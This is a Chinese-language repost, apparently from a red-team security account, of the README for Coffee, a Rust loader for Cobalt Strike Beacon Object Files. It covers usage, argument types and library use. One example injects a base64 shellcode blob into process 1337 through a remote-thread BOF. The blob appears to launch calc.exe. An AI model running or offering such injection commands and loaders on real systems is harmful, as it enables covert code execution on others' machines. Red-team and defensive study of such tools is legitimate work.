首页 时事 民生 政务 教育 文化 科技 财富 体娱 健康 情感
更多
旅行 百科 职场 楼市 企业 乐活 学术 汽车 时尚 创业 美食 幽默 美体 文摘

Rust加载器 - Coffee

文摘   2024-11-12 11:12   上海  

/ 咖啡 /

https://github.com/hakaioffsec/coffee

Coffee 是原始 Cobalt Strike 的 beacon_inline_execute ( https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics_aggressor-scripts/as-resources_functions.htm#beacon_inline_execute )的自定义实现。它用 Rust 编写,支持 Cobalt Strike 兼容层的大部分功能。Coffee 的结构使得它也可以用作其他项目中的库。

原始博客文章可以在这里找到:https://labs.hakaioffsec.com/coffee-a-coff-loader-made-in-rust/

1


   

用法

$ coffee.exe -hCoffee: A COFF loader made in Rust
Usage: coffee.exe [OPTIONS] --bof-path <BOF_PATH> [-- <ARGS>...]
Arguments:  [ARGS]...  Arguments to the BOF passed after the "--" delimiter, supported types are: str, wstr, int, short, bin
Options:  -b, --bof-path <BOF_PATH>      Path to the Beacon Object File (BOF)  -e, --entrypoint <ENTRYPOINT>  The entrypoint name to execute in case of a custom entrypoint name [default: go]  -v, --verbosity <VERBOSITY>    Verbosity level, 0 = ERROR, 1 = WARN, 2 = INFO, 3 = DEBUG, 4 = TRACE [default: 0]  -h, --help                     Print help  -V, --version                  Print version


1.1


   

参数

BOF 的参数可以在分隔符后传递--。每个参数必须以参数类型作为前缀,后跟冒号 ( :)。支持以下类型:

  • str- 以空字符结尾的字符串

  • wstr- 宽空终止字符串

  • int- 有符号的 32 位整数

  • short- 有符号的 16 位整数

  • bin- 经过 base64 编码的二进制 blob

2

   

示例

使用dir.x64.o来自https://github.com/trustedsec/CS-Situational-Awareness-BOF 存储库的 BOF 并将参数传递给 BOF:

coffee.exe --bof-path .\dir.x64.o -- wstr:"C:\\Windows\\System32"


使用来自 trustsec/CS-Remote-OPs-BOF ( https://github.com/trustedsec/CS-Remote-OPs-BOF )ntcreatethread.x64.o存储库的 BOF ,并传递 PID 和 shellcode 以作为 base64 编码的二进制数据执行。


coffee.exe --bof-path .\ntcreatethread.x64.o -- int:1337 bin:/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu+AdKgpBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA


3


   

作为库使用


cargo add coffee-ldr


Coffee 可以作为其他项目中的库使用。以下示例显示如何使用 Coffee 加载 BOF 并执行 BOF:


use coffee_ldr::loader::Coffee;
fn main() {    let whoami_bof: [u8; 6771] = [        0x64, 0x86, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x0A, 0x14, 0x00, 0x00, 0x33, 0x00, 0x00,        ...    ];
    let _ = Coffee::new(&whoami_bof).unwrap().execute(None, None, None);}


上面的例子将执行作为字节数组传递的 BOF 并在控制台中显示输出。

详细文档可以在这里找到:

https://docs.rs/coffee-ldr/latest/coffee_ldr/loader/struct.Coffee.html

4


   

从源代码构建

  1. 从 https://rustup.rs/ ( https://rustup.rs/ )安装 Rust

  2. 克隆存储库

  3. 使用以下方式构建项目


cargo build --release
Eonian Sharp
Eonian Sharp | 永恒之锋,专注APT框架、渗透测试攻击与防御的研究与开发,没有永恒的安全,但有永恒的正义之锋击破黑暗的不速之客。
 最新文章
钓鱼利器 | 红队免杀木马快速生成
Rust GUI 免杀生成器 - MaLoader
403绕过神器 - 4-ZERO-3
又一款 all in one 综合漏洞利用工具
"银狐"木马病毒变种,谨防微信链接分享!
漏洞预警 | 7-Zip代码执行漏洞CVE-2024-11477
Apache ZooKeeper Admin Server 身份验证绕过漏洞 CVE-2024-51504
高效挖掘SQL注入Burp插件 - DetSql
刻刀 | 高效资产管理系统 - TestNet
Linux 进程隐藏:中级隐藏篇
Rust加载器 - Coffee
Linux 进程隐藏:初级隐藏篇
恭喜中奖的师傅,请看这里
whoamifuck - Rust重构版
刻刀 | 若依定时任务SQL注入RCE一键利用工具 RuoYiExploitGUI_v1.0
免杀 | 利用管道通信传递参数
免杀 | 6种进程注入的方式
Windows10将不维护更新
msf生成windows的shellcode解析
密码学 | 分组密码
后渗透 | 信息收集工具
逆向 | vmp3.x 工具向脱壳
密码学 | 加解密算法学习
如何判断程序是用什么编程语言实现
逆向 | 反调试以及沙箱调试技巧
逆向 | 平坦化混淆
BurpSuite出现505 HTTP Version Not Supported的解决方法
漏洞预警 | Oracle WebLogic Server 存在反序列化漏洞
逆向工具系列 | x64dbg使用方法和技巧
逆向工具系列 | Kali逆向工具edb-debugger
逆向工具系列 | Cheat Engine(CE修改器)
逆向工具系列 | Binary Ninja4
EonianSharp · 永恒之锋安全
逆向工具系列 | Cutter
逆向工具系列 | jadx
2025 Rust 全员大会,庆祝Rust十周年!
逆向工具系列 | dnSpy
逆向工具系列 | OllyDBG
钓鱼钓不到,我还不知道鱼饵长啥样?
漏洞复现 | Windows TCP/IP IPv6 远程代码执行CVE-2024-38063
叮~ 你收到一份邮件通知,请查看...
刻刀-rust | 脉冲红队快速资产探测综合工具使用指南
【送黑悟空】 对目前安全工具的一个思考-选择使用rust破局
逆向工具系列 | Windbg
基础速查 | 敏感文件和目录
CVE-2024-21733 POC Apache Tomcat请求走私漏洞
逆向工具系列 | x64dbg
漏洞预警 | Windows TCP/IP 远程代码执行CVE-2024-38063
逆向工具系列 | GNU Debugger
root都无法修改文件?
 分类
时事
民生
政务
教育
文化
科技
财富
体娱
健康
情感
旅行
百科
职场
楼市
企业
乐活
学术
汽车
时尚
创业
美食
幽默
美体
文摘
 原创标签
时事 社会 财经 军事 教育 体育 科技 汽车 科学 房产 搞笑 综艺 明星 音乐 动漫 游戏 时尚 健康 旅游 美食 生活 摄影 宠物 职场 育儿 情感 小说 曲艺 文化 历史 三农 文学 娱乐 电影 视频 图片 新闻 宗教 电视剧 纪录片 广告创意 壁纸头像 心灵鸡汤 星座命理 教育培训 艺术文化 金融财经 健康医疗 美妆时尚 餐饮美食 母婴育儿 社会新闻 工业农业 时事政治 星座占卜 幽默笑话 独立短篇 连载作品 文化历史 科技互联网
 发布位置
广东 北京 山东 江苏 河南 浙江 山西 福建 河北 上海 四川 陕西 湖南 安徽 湖北 内蒙古 江西 云南 广西 甘肃 辽宁 黑龙江 贵州 新疆 重庆 吉林 天津 海南 青海 宁夏 西藏 香港 澳门 台湾 美国 加拿大 澳大利亚 日本 新加坡 英国 西班牙 新西兰 韩国 泰国 法国 德国 意大利 缅甸 菲律宾 马来西亚 越南 荷兰 柬埔寨 俄罗斯 巴西 智利 卢森堡 芬兰 瑞典 比利时 瑞士 土耳其 斐济 挪威 朝鲜 尼日利亚 阿根廷 匈牙利 爱尔兰 印度 老挝 葡萄牙 乌克兰 印度尼西亚 哈萨克斯坦 塔吉克斯坦 希腊 南非 蒙古 奥地利 肯尼亚 加纳 丹麦 津巴布韦 埃及 坦桑尼亚 捷克 阿联酋 安哥拉